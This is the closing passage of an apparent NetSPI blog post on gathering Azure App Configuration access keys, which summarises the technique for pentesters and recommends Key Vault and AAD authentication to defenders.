We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string and defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

The post How to Gather Azure App Configurations appeared first on NetSPI.

]]>